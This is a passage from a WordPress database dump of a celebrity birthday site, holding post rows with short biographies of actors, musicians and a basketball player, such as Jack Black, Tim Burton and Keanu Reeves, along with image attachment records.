2015.\r\n<h2>Where Are They Now</h2>\r\nKunis lives with Kutcher and their daughter in LA, and continues to make herself a household name in the world of Hollywood.\r\n\r\n<a href=\"https://commons.wikimedia.org/wiki/File:Mila_Kunis_(7601681006).jpg\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Mila Kunis','','publish','open','open','','mila-kunis','','','2015-10-14 20:39:34','2015-10-14 20:39:34','',0,'http://birthdaypedia.com/?p=221',0,'post','',0),(222,2,'2015-08-13 19:04:25','2015-08-13 19:04:25','','Edward Norton','','inherit','open','open','','edward-norton','','','2015-08-20 18:44:15','2015-08-20 18:44:15','',217,'http://birthdaypedia.com/wp-content/uploads/2015/08/Edward-Norton.jpg',0,'attachment','image/jpeg',0),(223,2,'2015-08-13 19:04:30','2015-08-13 19:04:30','','Amy Adams','','inherit','open','open','','amy-adams','','','2015-08-20 19:05:57','2015-08-20 19:05:57','',217,'http://birthdaypedia.com/wp-content/uploads/2015/08/Amy-Adams.jpg',0,'attachment','image/jpeg',0),(224,2,'2015-08-13 19:04:48','2015-08-13 19:04:48','','Hayden Panettiere','','inherit','open','open','','hayden-panettiere-2','','','2015-08-20 19:18:14','2015-08-20 19:18:14','',217,'http://birthdaypedia.com/wp-content/uploads/2015/08/Hayden-Panettiere.png',0,'attachment','image/png',0),(225,2,'2015-08-13 19:05:10','2015-08-13 19:05:10','','Antonio Banderas','','inherit','open','open','','antonio-banderas','','','2015-08-13 19:06:49','2015-08-13 19:06:49','',217,'http://birthdaypedia.com/wp-content/uploads/2015/08/Antonio-Banderas.jpg',0,'attachment','image/jpeg',0),(226,2,'2015-08-13 19:10:48','2015-08-13 19:10:48','','Alyson Stoner','','inherit','open','open','','alyson-stoner','','','2015-08-13 19:12:48','2015-08-13 19:12:48','',218,'http://birthdaypedia.com/wp-content/uploads/2015/08/Alyson-Stoner.jpg',0,'attachment','image/jpeg',0),(227,2,'2015-08-13 19:28:22','2015-08-13 19:28:22','','Cara Delevingne','','inherit','open','open','','cara-delevingne','','','2015-08-13 19:28:32','2015-08-13 19:28:32','',219,'http://birthdaypedia.com/wp-content/uploads/2015/08/Cara-Delevingne.jpg',0,'attachment','image/jpeg',0),(228,2,'2015-08-13 19:32:19','2015-08-13 19:32:19','','Alfred Hitchcock','','inherit','open','open','','alfred-hitchcock','','','2015-08-13 19:32:19','2015-08-13 19:32:19','',220,'http://birthdaypedia.com/wp-content/uploads/2015/08/Alfred-Hitchcock.jpg',0,'attachment','image/jpeg',0),(229,2,'2015-08-13 19:52:41','2015-08-13 19:52:41','','Mila Kunis','','inherit','open','open','','mila-kunis','','','2015-08-13 19:52:48','2015-08-13 19:52:48','',221,'http://birthdaypedia.com/wp-content/uploads/2015/08/Mila-Kunis.jpg',0,'attachment','image/jpeg',0),(231,2,'2015-08-28 08:00:02','2015-08-28 08:00:02','Zany, hilarious and charming, Jack Black is well-known for his movies where he frequently displayes his crazy skits and antics. His irresistible charm and natural ability to make the audience laugh are among his popular trait. Whether it is in animated films such as in Kung Fu Panda or several of his movies, he never fails to give people more reasons to be engaged in what he does because his projects are mostly hit-makers. For instance, The 2008 movie Kung Fu Panda earned amazing reviews, as well as his breakthrough roles in the films High Fidelity and Shallow Hal. Some of his recent projects include The Big Year and Kung Fu Panda 2, which were also blockbuster films by Black.\r\n<h2>Background</h2>\r\nThomas Jacob Black, popularly known in the silver screen as Jack Black, was born in Santa Monica, in California. He graduated from UCLA, and he joined a group called Actors Gang by Tim Robbins. It is a performance troupe that was located in Los Angeles, and it spawned numerous talented actors including John Cusack. In fact, Black had his first acting project with Robbins, and he also had a movvie where he starred with John Cusack. In particular, the movie Bob Roberts, which was released in 1992, was played opposite Robbins. Although it was only a low-budget film, critics were impressed by Black\'s acting performance. He also took part in a musical, specifically the Tenacious D, and it was shown in 1994. Various other movies that featured Jack Black during the 1990s included Waterworld, Cable Guy, The Jackal, Dead Man Walking, Cradle Will Rock, Enemy of the State and Mars Attacks.\r\n<h2>Reaching Greater Heights</h2>\r\nIt did not take too long before people began to take notice of Black\'s acting skills, as they found out more about this actor from his <a href=\"http://www.aceshowbiz.com/celebrity/jack_black/filmography.html\" target=\"_blank\">movies</a>. Perhaps, the most momentous part of his acting career was when he starred in the 2000 movie High Fidelity, which was a film adaptation of the novel by Nick Hornby. Black portrayed the role of Barry, who was a record store clerk with an exceptional deal of charm and wit. He might have been only one of the minor characters, yet critics were impressed by his outstanding performance in that movie. He was also among the stars of the 2001 movie Shallow Hal, which also featured Gwyneth Paltrow, as well as several other actors. School of Rock and <a href=\"http://ocgov.com/\" target=\"_blank\">Orange County</a> were other films including Black, and these continued to feature the actor\'s comedic skills like no other.\r\n<h2>Off-Screen</h2>\r\nOn-screen, everyone considers Black as a funny guy who can make the audience roll with laughter each time he opens his mouth and say something witty. As for his personal life, he is a loving husband and amazing father to his children. He is married to <a href=\"https://en.wikipedia.org/wiki/Tanya_Haden\" target=\"_blank\">Tanya Hayden</a>, and his children include Thomas Jack and Samuel. His comedic talent makes him a true gem in Hollywood, and he continues to receive excellent feedback from both critics and audiences worldwide.\r\n\r\n<a href=\"https://www.flickr.com/photos/karolfranks/6297008113/sizes/z/\" target=\"_blank\">Image credit</a>\r\n\r\n ','Jack Black','','publish','open','open','','jack-black','','','2015-10-14 14:26:25','2015-10-14 14:26:25','',0,'http://birthdaypedia.com/?p=231',0,'post','',0),(232,2,'2015-08-19 20:29:18','2015-08-19 20:29:18','','jack black','','inherit','open','open','','jack-black','','','2015-08-19 20:31:03','2015-08-19 20:31:03','',231,'http://birthdaypedia.com/wp-content/uploads/2015/08/jack-black.jpg',0,'attachment','image/jpeg',0),(233,2,'2015-08-26 07:51:12','2015-08-26 07:51:12','A renowned American comedian, Melissa McCarthy was born and raised in <a href=\"http://www.plainfield-il.org/\" target=\"_blank\">Plainfield</a>, in Illinois. She transferred to New York, where she pursued a career as a comedian. Afterwards, she decided to move to Los Angeles, and it was here where she became a member of The Groundlings, which was a well-known comedy theater in the city. Aside from dabbling on various comedy stints, she was able to get an acting role in the award-winning series \"Gilmore Girls\", where she portrayed Sookie St. James. Among her other films and TV shows that made her quite famous in the acting industry included Tammy, The Heat and Mike & Molly.\r\n<h2>Background</h2>\r\nMcCarthy was the daughter of Irish Catholic farmers in Illinois. Although she grew up in this state, she moved to New York to pursue a professional career as a comedian. Her talent in this field gave her several opportunities to perform as a standup comedian at several New York clubs including The Improv and Stand Up New York. During her stay in the city, she underwent professional training at the famed \"The Actor\'s Studio\", and this gave her an opportunity to take part in a number of stage productions. Then, she transferred to Los Angeles in the latter part of the 1990s. She continued with her acting career until she gained more opportunities to star in some shows until she got her big break after her dedication to make it big in the industry.\r\n<h2>Accomplishments and Recognitions</h2>\r\nMcCarthy was able to refine her acting skills when she became a member of The Groundlings. This theater was known for talented individuals in the field of sketch comedy. Being a member of the <a href=\"http://www.groundlings.com/\" target=\"_blank\">Groundling</a>, this gave her a chance to write and perform in shows featured at the theater. She was also one of the teachers at the school\'s company, and this provided her with an opportunity to share her talent with other members. As an actress, she became quite visible in a number of TV shows and films such as Charlie\'s Angels, Go, The Kid, and the variety show by Jenny McCarthy (who was Melissa\'s cousin). However, her biggest opportunity to be known as an actress was in Gilmore Girls, which was a famous TV show that was aired for several years.\r\n<h2>Additional Facts</h2>\r\nMelissa McCarthy was married to Ben Falcone, who was her long-time boyfriend. It was at The Groundling Theater where the two met, and they got married in October of 2005. The couple has two children named Vivian and Georgette. In 2010, McCarthy decided to go back to work as an actress, and this time, it was in the TV show <a href=\"http://www.cbs.com/shows/mike_and_molly/\" target=\"_blank\">Molly & Mike</a>. This brilliant actress also owns her clothing line, and she currently resides in Los Angeles. This actress is indeed a professional in every way, as well as a dedicated mother of two. Despite her busy and hectic schedule, she still manages to run her clothing business, among her other preoccupations in life.\r\n\r\n<a href=\"https://www.flickr.com/photos/gazeronly/18700819026/sizes/z/\" target=\"_blank\">Image credit</a>\r\n\r\n ','Melissa McCarthy','','publish','open','open','','melissa-mccarthy','','','2015-10-14 14:26:47','2015-10-14 14:26:47','',0,'http://birthdaypedia.com/?p=233',0,'post','',0),(234,2,'2015-08-20 00:56:33','2015-08-20 00:56:33','','Melissa McCarthy','','inherit','open','open','','melissa-mccarthy','','','2015-08-20 01:01:45','2015-08-20 01:01:45','',233,'http://birthdaypedia.com/wp-content/uploads/2015/08/Melissa-McCarthy.jpg',0,'attachment','image/jpeg',0),(235,2,'2015-08-20 18:57:27','2015-08-20 18:57:27','','Gerald McRaney','','inherit','open','open','','gerald-mcraney','','','2015-08-20 18:57:36','2015-08-20 18:57:36','',213,'http://birthdaypedia.com/wp-content/uploads/2015/08/Gerald-McRaney.jpg',0,'attachment','image/jpeg',0),(236,2,'2015-08-24 09:27:22','2015-08-24 09:27:22','Popularly known as Ron from the movie \"<a href=\"https://en.wikipedia.org/wiki/Harry_Potter\" target=\"_blank\">Harry Potter</a>\", Rupert Grint is an English actor born in Harlow, in Essex, England. His father was a memorabilia dealer while his mother was a housewife. As a child, he as always been interested in theater arts. In fact, he was quite active in various school productions during his elementary years at St. Joseph\'s Primary School. Here, he took part in acting roles whenever there were opportunities for him to do so. For instance, he was a member of the Top Hat Stage and Screen School, and this was a theater group in his hometown that gave him an acting role in the play Noah\'s Ark. Even when he moved to another school at Richard Hale, he still continued acting, although he was not doing this professionally.\r\n<h3>Initial Acting Career</h3>\r\nBy the time Grint turned 16 years old, he decided to quit school. His decision for doing so was largely due to the fact that he wanted to focus on acting. He was fortunate enough to become a part of the film adaptation of <a href=\"http://www.jkrowling.com/\" target=\"_blank\">J.K. Rowling</a>\'s book, \"Harry Potter\", which was a dream come true for Grint. As Rowling was keen on having an all-British cast for the movie, this was an opportunity for Grint to get a part in it after learning about an open casting. The young actor send a video of himself, in which he was rapping and expressing his desire to take the role of Ron Weasley, who was a protagonist in the movie. The casting team was impressed and contacted Grint for a meeting – and this began his successful career as a professional actor. It was also from one of the Harry Potter series that Grint received several awards such as the Young Artist Award and <a href=\"https://en.wikipedia.org/wiki/Satellite_Awards\" target=\"_blank\">Satellite Award</a>.\r\n<h3>Achievements</h3>\r\nAside from getting an acting role in Harry Potter movies, Grint had a chance to star in other films including \"Thunderpants\", although this did not gain much popularity from critics. In this film, though, Grint starred as Alan, who was the only friend of the lead character. He was also a part of other films such as \"Driving Lessons\", which was a greater improvement as compared to the previous one where Grint starrred in. Although this movie received mixed reviews from audiences and critics, he was praised for his acting skills and performance. It was in this film where he portrayed the role of an oppressed teenager. Critics though of Grint as quite a talented young actor who had that natural charm to win the approval of the audience.\r\n<h3>Bottom Line</h3>\r\nGrint has gained much fame from portraying the role of Ron Weasley, who was one of the best friends of Harry Potter. However, aside from receiving positive reviews and feedback from critics when he starred in this film, he also dabbled in other movies that earned him excellent ratings from both critics and audience. This actor still has a long way to go, but he is indeed on the road to success with his sense of focus in acting and determination to make it big as a professional in showbusiness.\r\n\r\n<a href=\"https://www.flickr.com/photos/maggierda/2663171344/sizes/z/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Rupert Grint','','publish','open','open','','rupert-grint','','','2017-06-20 16:09:55','2017-06-20 16:09:55','',0,'http://birthdaypedia.com/?p=236',0,'post','',1),(237,2,'2015-08-20 19:36:16','2015-08-20 19:36:16','','Rupert Grint','','inherit','open','open','','rupert-grint','','','2015-08-20 19:39:06','2015-08-20 19:39:06','',236,'http://birthdaypedia.com/wp-content/uploads/2015/08/Rupert-Grint.jpg',0,'attachment','image/jpeg',0),(238,2,'2015-08-25 09:42:46','2015-08-25 09:42:46','Known for his films with a unique and even eerie vibe, Tim Burton is a famous screenwriter, producer and director. He started his career as an animator for Disney, which lasted him for less than one year before he began to explore his own potentials and make films with extraordinary themes. Generally, most of the movies by Tim Burton were focused on a mixture of horror and fantasy, which includes top-grossing films such as <a href=\"http://www.imdb.com/title/tt0099487/\" target=\"_blank\">Edward Scissorhands</a>, Nightmare Before Christmas and <a href=\"https://en.wikipedia.org/wiki/Beetlejuice\" target=\"_blank\">Beetlejuice</a>. He was also the man behind the movie Batman, and it gained outstanding reviews from critics and audiences from various parts of the world.\r\n<h3>Background</h3>\r\nTimothy Walter Burton, also known as Tim Burton, is an accomplished director, among other professions. He was born in <a href=\"http://www.burbankca.gov/\" target=\"_blank\">Burbank</a>, in California, and he has always been fascinated with horror movies by the brilliant Roger Corman. In addition to his avid interest in this type of movie, he was also a noted artist. In fact, he studied art in the California Institute of Arts, and it was here where he developed his skill in drawing. In this school, Burton also gained a degree in animation, which allowed him to take his interest in art more seriously. Upon completing this course, he found employment at Walt Disney Studios where he became an apprentice animator. However, he decided to explore other horizons and quit his job. This allowed him to work on his own films, particularly the short movie entitled \"Vincent\". This initially earned him an award and recognition from critics.\r\n<h3>Accomplishments</h3>\r\nBurton began making more films that are geared towards themes he loved the most, which were more into horror and fantasy. For instance, he released a version of Frankenstein, which was originally and uniquely his own style. This short film was called Frankenweenie, wich was released in 1984. The year after that, he directed another movie, which was a comedy entitled \"Pee-Wee\'s Big Adventure\".\r\n\r\nAnother movie that he directed was Beetlejuice, which came out in 1988. This ghost story starred Alec Baldwin, Geena Davis and Michael keaton, which was a mixture of horror and fantasy. However, his biggest break was the movie Batman, which he directed. This top-grossing film sold about $100 million during the initial 10 days upon its release. It was followed by more film by Burton including Edward Scissorhands, which was a social satire with so much depth at the same time.\r\n<h3>Other Facts about Burton</h3>\r\nIn addition to his exceptional talent as a director, Burton was also famed for his artwork. In fact, he had severa of his artworks displayed at the <a href=\"http://www.moma.org/\" target=\"_blank\">Museum of Modern Art</a>, in New York. More than 700 of his paintings and drawings were exhibited in this museum during the years 2009 and 2010. Indeed, he was a true genius who has received much praises and recognition from critics and audiences in various parts of the world. He also continues to impress professionals in showbusiness for his remarkable talent, which took him to greater heights in this industry.\r\n\r\n<a href=\"https://commons.wikimedia.org/wiki/File:Tim_Burton_Frankenweenie_2012.jpg\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Tim Burton','','publish','open','open','','tim-burton','','','2015-10-14 14:30:10','2015-10-14 14:30:10','',0,'http://birthdaypedia.com/?p=238',0,'post','',0),(239,2,'2015-08-20 19:53:32','2015-08-20 19:53:32','','Tim Burton','','inherit','open','open','','tim-burton','','','2015-08-20 19:53:37','2015-08-20 19:53:37','',238,'http://birthdaypedia.com/wp-content/uploads/2015/08/Tim-Burton.jpg',0,'attachment','image/jpeg',0),(240,2,'2015-08-29 07:02:19','2015-08-29 07:02:19','For <a href=\"https://en.wikipedia.org/wiki/Breaking_Bad\" target=\"_blank\">Breaking Bad</a> fans, it must be impossible for them to not know who Aaron Paul is. In fact, it was in this TV drama series that earned him much fame, among a few other acting roles he took part in. It was his exceptional acting skill in this TV series that allowed him to earn massive accomplishments as an actor, where he also received two <a href=\"https://en.wikipedia.org/wiki/Emmy_Award\" target=\"_blank\">Emmy awards</a>. However, he also starred in his very first acting role, which was a TV series by HBO called Big Love. For years, Paul became quite visible to fans as a TV actor and commercial model, which he had been doing for a number of years.\r\n<h3>Background</h3>\r\nBorn as Aaron Paul Sturtevant, this famous TV actor was a resident of Idaho. However, he decided to move to Hollywood, so he could pursue his dream of becoming an actor. In fact, his interest in acting started even when he was young. Thus, he joined several acting and drama clubs, particularly the one in his school in Boise, Idaho. His passion in acting was so intense, that he did not mind it that other people would learn about his desire to become a professional actor. Hence, when he graduated from High School, he decided to transfer to Los Angeles, in California. He was 17 years old during that time, and this started his successful career as a TV actor and commercial model. Some of his early exposures included a music video by Korn and a TV commercial by Corn Pops.\r\n<h3>Acting Career</h3>\r\nIt was in the early 2000s when Paul began his long list of TV performances. For instance, he was one of the casts of the original Beverly Hills 90210, and he also was a part of other TV series such as Veronica Mars, CSI: Miami and ER. After taking acting roles in these shows, he started starring in various films to expand his career as a professional actor. In 2002, he starred in K-Pax, as well as the Van Wilder. Four years after, he was given a minor role in Mission Impossible III, where Tom Cruise was the lead actor. However, his biggest break as an actor was in 2007, and it was on the HBO series entitled Big Love, which starred <a href=\"http://www.imdb.com/name/nm1086543/\" target=\"_blank\">Amanda Seyfried</a>.\r\n<h3>Accomplishments</h3>\r\nNotable for his role in Braking Bad, a TV show by Vince Gilligan, this propelled Paul\'s acting career. In fact, he received two Emmys from this show, as well as five nominations from the same Award-giving body. His nominations included Outstanding Supporting Actor in a Drama, and he won in the years 2010, 2012, and just recently in 2014. Aside from working on an important role in Breaking Bad, Paul has also been involved in other projects such as the movies Smashed and Decoding Annie Parker. Other films he recently worked on include A Long Way Down, as well as Exodus, which were both in 2014. Thus, his fans should be expecting to see more of his exceptional acting skills as evident in these films, among his other acting projects.\r\n\r\n<a href=\"https://www.flickr.com/photos/gageskidmore/9365317668/sizes/z/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Aaron Paul','','publish','open','open','','aaron-paul','','','2015-10-14 14:23:54','2015-10-14 14:23:54','',0,'http://birthdaypedia.com/?p=240',0,'post','',0),(241,2,'2015-08-31 07:02:21','2015-08-31 07:02:21','Famous for her massive hits such as \"Shake Your Love\", \"Lost in Your Eyes\" and \"Only in My Dreams\", Debbie Gibson has been a household name in the 80s for her impeccable singing and performing skills. In fact, her career propelled in the late 80s when Electric Youth, her successful album, was released to the public. Aside from her singing career, she also took part in some Broadway productions such as Gypsy and Beauty and the Beast. These were all products of her perseverance and passion in singing and acting, which were two of her favorite activities as a child and throughout her adulthood.\r\n<h3>Background</h3>\r\nBorn in New York, Deborah Ann Gibson (otherwise known as Debbie Gibson) has always been a musician at heart. She took piano lessons from the legendary Morton Estrin, who was also the teacher of Billy Joel. Gibson was already noted for her love for music at a tender age of 5, which was also the time that she began singing and playing the piano. When she was 6, she wrote a song entitled \"Make Sure You Know Your Classroom\", and she continued to express her musical talent in 5th grade when she composed her very own opera called \"Alice in Operaland\". Indeed she started composing at a young age, and she also took part in some theatrical acting since she was 5 years old. At age 8, she joined the Metropolitan Opera House\'s children\'s chorus, which was in New York City. No matter how busy her schedule was, though, she still managed to enjoy her childhood as she played with friends.\r\n<h3>The Making of an Artist</h3>\r\nDriven by her intense love for music, Gibson decided to transform the garage at her house into a makeshift music studio. She spent her free time in this part of the house where she wrote and recorded music. When she was 12 years old, she joined a song-writing contest and won $1,000. The title of her original song was \"I Come from America\", and it was at this point in her life that her parents realized her extraordinary talent. Thus, they hired a manager for Gibson, and it was Doug Breibart who guided the young artist on how to arrange, produce and engineer her original compositions. By 1985, Gibson has already written more than 100 songs. So, when she formally released her album called Out of the Blue back in 1987, it was not a surprise that the public were impressed and coined her as a pop icon.\r\n<h3>Accomplishments</h3>\r\nIn spite of her extremely busy schedule, Gibson still managed to juggle her time between being a pop icon and a student. In fact, she graduated High School with honors, and this proved how she could become both a successful person in her private and public life. Among her list of accomplishments include the ASCAP award for Songwriter of the Year in 1989, which she shared with Bruce Springsteen. Her album in 1989, entitled Electric Youth was also at the No. 1 spot for 5 weeks in the Billboard Charts. Presently, she is not very active in the music scene, but her legacy in the music industry makes her a legend.\r\n\r\n<a href=\"https://commons.wikimedia.org/wiki/File:Debbie_Gibson_adjusted.jpg\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Debbie Gibson','','publish','open','open','','debbie-gibson','','','2015-10-14 14:23:32','2015-10-14 14:23:32','',0,'http://birthdaypedia.com/?p=241',0,'post','',0),(242,2,'2015-08-20 20:12:20','2015-08-20 20:12:20','','Aaron Paul','','inherit','open','open','','aaron-paul','','','2015-08-20 20:12:26','2015-08-20 20:12:26','',240,'http://birthdaypedia.com/wp-content/uploads/2015/08/Aaron-Paul.jpg',0,'attachment','image/jpeg',0),(243,2,'2015-08-20 20:32:14','2015-08-20 20:32:14','','Debbie Gibson','','inherit','open','open','','debbie-gibson','','','2015-08-20 20:32:27','2015-08-20 20:32:27','',241,'http://birthdaypedia.com/wp-content/uploads/2015/08/Debbie-Gibson.jpg',0,'attachment','image/jpeg',0),(246,2,'2015-09-08 17:48:56','2015-09-08 17:48:56','','wellness-junky160','','inherit','open','closed','','wellness-junky160','','','2015-09-08 17:48:56','2015-09-08 17:48:56','',0,'http://birthdaypedia.com/wp-content/uploads/2015/09/wellness-junky160.png',0,'attachment','image/png',0),(247,2,'2015-09-08 17:48:57','2015-09-08 17:48:57','','wellness-junky300','','inherit','open','closed','','wellness-junky300','','','2015-09-08 17:48:57','2015-09-08 17:48:57','',0,'http://birthdaypedia.com/wp-content/uploads/2015/09/wellness-junky300.png',0,'attachment','image/png',0),(248,2,'2015-09-08 17:48:58','2015-09-08 17:48:58','','wellness-junky728','','inherit','open','closed','','wellness-junky728','','','2015-09-08 17:48:58','2015-09-08 17:48:58','',0,'http://birthdaypedia.com/wp-content/uploads/2015/09/wellness-junky728.png',0,'attachment','image/png',0),(250,2,'2015-09-01 10:40:16','2015-09-01 10:40:16','<h2>In the Beginning</h2>\r\n<a href=\"https://en.wikipedia.org/wiki/Tim_Hardaway\" target=\"_blank\">Tim Hardaway</a>, one of the all time Greats in professional basketball, was born on September 1, 1966 in Chicago, Illinois. Hardaway was raised in Chicago, graduating from high school there, and then moved to El Paso, Texas to attend the University of Texas at El Paso, where he played college ball for a well known coach, Don Haskins. Thus began a successful college basketball career, followed by a widely followed professional ball career.\r\n<h2>Career Accomplishments</h2>\r\nHis college career landed his team 2 appearances in the NCAA tournament, and he was named MVP in El Paso\'s Sun Bowl Invitation Tournament two years in a row. Before moving on to professional ball, Hardaway was named the best college player in the nation six feet tall, and won the Frances Naismith Award.\r\n\r\nHe had a long professional career with the <a href=\"http://nba.com\" target=\"_blank\">NBA</a>, playing first for the Golden State Warriors. Within two years, Hardaway had lead his team to the playoffs, but ultimately couldn\'t defeat the Lakers in the end. Hardaway made the NBA All-Star team three years in a row while playing as a Warrior.\r\n\r\nHe was traded to the Miami Heat in 1995, where he continued his strong performance. He lead the team to the playoffs in year one, but an early elimination kept them from proceeding in the tournament. The next year was one of Hardaway\'s best, as he was voted fourth for NBA Most Valuable Player Award and lead his team to a franchise record number of wins (61). They proceeded much further in the playoffs but ultimately slipped to the Chicago Bulls in the final rounds.\r\n\r\nIn the year 2000, Hardaway won a gold medal playing for the USA Men\'s basketball Team in the Olympics. This was an ultimate peak in his career, and the following seasons would be filled with trades to several other teams, and bench time. Hardaway eventually retired and became a Basketball analyst for <a href=\"http://espn.go.com/\" target=\"_blank\">ESPN</a>. As of 2014, Hardaway announced his role as assistant coach for the Detroit Pistons.\r\n<h2>Most Known For</h2>\r\nHardaway is most known for his success as a “little” guy in the big league. Standing at just 6 feet tall, he\'s known as one of the greatest guards to ever play in the NBA. He\'s very well known for his crossover dribble, which television and sports commentators named the “UTEP two-step” during his college career at UTEP. He\'s also well known for Olympic Performance, which won him a Gold Medal in Men\'s Basketball for the USA. <i> </i>\r\n<h2>Current Personal Life</h2>\r\nHardaway is married and has two children, Tim Jr. and Nia. Tim Jr. has made a name for himself in basketball, and was drafted to the New York Knicks in 2013.\r\n\r\nIn 2007, Hardaway made a homophobic comment, and when confronted about it, admitted to being a homophobic man. The comments earned Hardaway a heap of negative attention. Several months after the remarks, Hardaway apologized for his hurtful comments and has since taken active steps in the support of the LGBT community. <i> </i>\r\n<h2>Where They Are Now</h2>\r\nHardaway currently lives in Miami and serves as assistant coach for the <a href=\"https://en.wikipedia.org/wiki/Detroit_Pistons\" target=\"_blank\">Detroit Pistons</a>. He\'s seen frequently on the sidelines of his son\'s games, as well.\r\n\r\n[<a href=\"https://www.flickr.com/photos/mgoblog/8579231900/sizes/c/\" target=\"_blank\">Image</a>]\r\n\r\n ','Tim Hardaway','','publish','open','open','','tim-hardaway','','','2015-10-14 14:22:43','2015-10-14 14:22:43','',0,'http://birthdaypedia.com/?p=250',0,'post','',0),(251,2,'2015-09-15 03:10:54','2015-09-15 03:10:54','','Tim Hardaway','','inherit','open','closed','','tim','','','2015-09-15 03:11:26','2015-09-15 03:11:26','',250,'http://birthdaypedia.com/wp-content/uploads/2015/09/Tim.jpg',0,'attachment','image/jpeg',0),(252,2,'2015-09-02 10:14:17','2015-09-02 10:14:17','<h2>In the Beginning</h2>\r\nKeanu Reeves was born in <a href=\"https://en.wikipedia.org/wiki/Beirut\" target=\"_blank\">Beirut, Lebanon</a>, on September 2, 1964. Reeves was born into a family with a rich variety of heritage, as his mother was English and his father was of Hawaiian, Chinese, English and Portuguese ancestry. Reeves\' parent\'s divorced when he was young, and he moved around the world frequently as his mother took several husbands throughout the course of his life. Reeve\'s interest in acting peaked when he was 15 and began as a production assistant for his Hollywood and Broadway director stepfather <a href=\"http://birthdaypedia.com/aaron-paul/\">Paul Aaron</a>.\r\n\r\nReeves attended four high schools in five years, and never performed well academically due to his dyslexia. He was expelled from one school for being rambunctious and mouthy to his authorities, and claimed to be more into athletics than anything else. Reeves had the dream of playing professional ice hockey and played well as a goalie in high school, but an injury ended his dreams. Eventually, Reeves enrolled in a secondary school that allowed him to act while getting an education, but he ultimately dropped out to pursue a career in acting.\r\n<h2>Career Accomplishments</h2>\r\nReeves acting career began officially when he was 9 years old as he appeared in a small theater production called “Damn Yankees”, and over the following decade he became more and more interested in an acting career, despite school and athletics tugging at his attention. Reeves moved to Los Angeles when he was 20 years old and made his screen acting debut in one episode of “Hangin\' In”. Over the next several years, he worked hard to earn roles in commercials, on stages, and as correspondents for TV shows.\r\n\r\nIn 1986, Reeves appeared in his first movie, called “Youngbloods”. After the movie, he picked up his first agent, who would work with him for decades to come. The 90\'s lead to Reeve\'s increasing in popularity, specifically for the younger generation. He won MTV\'s “Most Desirable Male” Award in 1992 and began his involvement in several Independent films later that year.\r\n\r\n“Speed” debuted in 1994 and was Reeve\'s first major hit, and it elevated him to a whole new level of fame. <a href=\"http://www.imdb.com/title/tt0133093/\" target=\"_blank\">“The Matrix”</a> was next; the trilogy starred Reeves and debuted in 1999. In early 2005, Reeves was recognized by the Hollywood Walk of Fame with a Star. Several hit films followed and Reeves continues to develop his work as an actor today.\r\n<h2>Most Known For</h2>\r\nReeves is most well known for his starring role as Neo in “The Matrix” Trilogy. He\'s also well known for “Point Break”, “Speed”, “Dangerous Liaisons” and “Little Buddha”.\r\n\r\nHe\'s known for the demeanor that he adapts for many of his roles, which is positively relaxed. He\'s also critically acclaimed for his versatility and ability to move easily between calm and collected to “loose cannon” status.\r\n<h2>Current Personal Life</h2>\r\nReeves is technically a Citizen of Great Britain and Canada, but holds an American green card. He has homes in Hollywood and Manhattan, but travels frequently around the world.\r\n\r\nIn December of 1999, Reeves\'s girlfriend gave birth prematurely to a stillborn baby; one year later she died in a car accident. Reeves took time off of filming the Matrix trilogy to grieve. Though there haven\'t been any notable other relationships, Reeves has had issues with women stalking him at his home. On two separate occasions, women have broken into his home. Both times, Reeves had the women arrested.\r\n\r\nHe claims to be religious, but not affiliated with any one religion or culture in that way.\r\n<h2>Where They Are Now<i> </i></h2>\r\nReeves continues to live in the USA as he works on future projects that will debut in the coming years. He\'s currently filming a movie called, “<a href=\"http://www.imdb.com/title/tt1974419/\" target=\"_blank\">The Neon Demon</a>” and is in post production for “The Bad Batch”.\r\n\r\n[<a href=\"https://www.flickr.com/photos/30456663@N07/3094401822/sizes/o/\" target=\"_blank\">Image</a>]\r\n\r\n ','Keanu Reeves','','publish','open','open','','keanu-reeves','','','2015-10-09 17:07:27','2015-10-09 17:07:27','',0,'http://birthdaypedia.com/?p=252',0,'post','',0),(253,2,'2015-09-15 03:28:21','2015-09-15 03:28:21','','Keanu Reeves','','inherit','open','closed','','keanu-reeves','','','2015-09-15 03:28:29','2015-09-15 03:28:29','',252,'http://birthdaypedia.com/wp-content/uploads/2015/09/Keanu-Reeves.jpg',0,'attachment','image/jpeg',0),(254,2,'2015-09-03 10:29:58','2015-09-03 10:29:58','<h2>In the Beginning</h2>\r\nCharlie Sheen, named at birth Carlos Irwin Estevez, was born in New York City, and is the son of actor Martin Sheen and artist Janet Templeton. Estevez is one of four kids; he has two older brothers, Emilio and Ramon, and a younger sister, Renee. All four kids grew up to be relatively famous actors, with Carlos and Emilio Estevez leading the way in their success.\r\n\r\nHe showed an early interest in acting and film making as he created a amateur films with his brothers and childhood friends (also turned actors), <a href=\"http://birthdaypedia.com/sean-penn/\">Sean Penn</a> and Rob Lowe. He was an excellent baseball player in high school, but ultimately flunked out before graduation due to poor grades and lack of attendance. This spurred him on to pursue acting in full force, and he decided to take the stage name Charlie Sheen.\r\n<h2>Career Accomplishments</h2>\r\nSheen\'s film career kicked off with a role in <a href=\"http://www.imdb.com/media/rm3730015232/tt0087985?ref_=ttmd_md_nxt\" target=\"_blank\">the Cold War drama “Red Dawn”</a>, where he played side by side with Patrick Swayze and Jennifer Grey. Two years later in 1986, his stardom rose to new heights with his roles in “Ferris Bueller\'s Day Off” and “Platoon”. These two big movies prompted years of success as he starred in movies alongside great actors like Clint Eastwood, Kiefer Sutherland, and Bill Murray.\r\n\r\nHis film career still going strong, Sheen went on to conquer the world of television in the year 2000. He replaced Michael J. Fox\'s role in “Spin City” for the final two seasons, and won his first Golden Globe Award for the role. The following year, Sheen was cast in the sitcom “Two and a Half Men”, which aired on CBS. The TV show was inspired and based on the actor himself, who was openly rough around the edges. The show earned Sheen an <a href=\"https://en.wikipedia.org/wiki/ALMA_Award\" target=\"_blank\">ALMA Award</a> and three Emmy Award nominations, as well as two Golden Globe Award nominations. It also made him the highest paid TV actor per episode, as he made $1.25 million per episode.\r\n<h2>Most Known For</h2>\r\nSheen is most well known for his movies “Platoon”, “Lucas”, “Ferris Bueller\'s Day Off”, “Young Guns”, “Major League”, “Money Talks”, and his roles in TV Shows “Spin City” and “Two and A Half Men”.\r\n\r\nSheen is an actor who has drawn a lot of attention to himself through his personal life. He\'s well known around Hollywood as a “Bad boy”, and has gotten himself in a good bit of trouble at work and personally. In 2011, Sheen was publicly dismissed from his television show “Two and 